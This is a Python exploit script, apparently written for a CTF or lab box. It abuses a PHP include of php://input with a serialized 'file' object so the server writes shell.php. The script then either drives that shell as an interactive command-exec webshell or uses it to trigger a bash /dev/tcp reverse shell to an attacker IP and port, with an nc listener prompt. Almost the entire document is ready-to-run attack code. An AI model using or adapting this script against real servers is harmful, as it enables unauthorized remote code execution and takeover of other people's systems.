import requests
import sys
import time
# CHANGE THIS TO YOUR TARGET
base_url = "http://TARGET/<HIDDEN DIRECTORY>/"
# index.php is requested with file=php://input, i.e. the raw POST body;
# deploy() sends the serialized payload as that body.
index_url = base_url + "index.php?file=php://input"
# URL of the file named in the "file" field of the payloads below.
shell_url = base_url + "shell.php"
# Basic command-exec webshell
# PHP-serialized "file" object with two properties. Each s:N: prefix must
# equal the length of the string that follows (s:30: for the PHP stub here);
# make_revshell() computes the same prefix with len() for a variable stub.
webshell_payload = 'O:4:"file":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:30:"<?php system($_GET[\'cmd\']); ?>";}'
def make_revshell(ip, port):
    """Return the serialized ``file`` object whose ``data`` field is a PHP
    stub that connects back to *ip*:*port*.

    The ``s:N:`` prefix in front of the stub is derived from ``len()`` so
    the serialized string stays consistent for any ip/port length.
    """
    stub = "<?php system('bash -c \"bash -i >& /dev/tcp/%s/%s 0>&1\"'); ?>" % (ip, port)
    serialized = 'O:4:"file":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:%d:"%s";}' % (
        len(stub),
        stub,
    )
    return serialized
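def interactive_shell():
    """Read commands from stdin and forward each one to ``shell_url``.

    Loops until the user types ``exit``/``quit`` or closes stdin. Uses
    ``sys.exit`` instead of the ``exit()`` builtin, which is installed by
    the ``site`` module and is absent under ``python -S``; EOF and Ctrl-C
    end the session cleanly instead of with a traceback.
    """
    print("[*] Starting interactive shell. Type 'exit' or 'quit' to close shell.")
    while True:
        try:
            cmd = input("$ ")
        except (EOFError, KeyboardInterrupt):
            # Ctrl-D / Ctrl-C: leave the loop quietly.
            sys.exit(0)
        if cmd.strip().lower() in ("exit", "quit"):
            sys.exit(0)
        r = requests.get(shell_url, params={"cmd": cmd})
        print(r.text)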
def deploy(payload):
    """POST *payload* to ``index_url`` and report whether the server answered 200.

    Only the HTTP status code is inspected; the response body is ignored.
    """
    response = requests.post(index_url, data=payload)
    if response.status_code != 200:
        print("[-] Failed, status:", response.status_code)
        return
    print("[+] Payload deployed.")
def trigger_shell():
    """Request ``shell_url`` once with a 2 s timeout.

    A ``ReadTimeout`` is swallowed on purpose; any other request error
    propagates. The final message is printed in both cases.
    """
    print("[*] Triggering shell...")
    try:
        requests.get(shell_url, timeout=2)
    except requests.exceptions.ReadTimeout:
        # Expected: the author notes the response never completes because
        # the connection is taken over by the reverse shell.
        pass
    print("[+] If all went well, check your nc listener!")
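if __name__ == "__main__":
    # Sub-command dispatch. Any invocation that is not a complete
    # "shell" or "rev IP PORT" prints the usage text: previously an
    # unknown sub-command exited silently and "rev" without IP/PORT
    # raised IndexError. The usage strings were f-strings with no
    # placeholders; plain literals print the same text.
    args = sys.argv[1:]
    mode = args[0] if args else None
    if mode == "rev" and len(args) >= 3:
        ip, port = args[1], int(args[2])
        payload = make_revshell(ip, port)
        print(f"[*] Deploying reverse shell to {ip}:{port} ...")
        deploy(payload)
        print(f"[*] Start listener with: nc -lvnp {port}")
        # Short pause before requesting shell.php (original timing kept).
        time.sleep(2)
        trigger_shell()
    elif mode == "shell":
        print("[*] Deploying webshell...")
        deploy(webshell_payload)
        interactive_shell()
    else:
        print("Usage:")
        print(" python3 exploit.py shell # deploy command shell")
        print(" python3 exploit.py rev IP PORT # reverse shell")
        sys.exit(0)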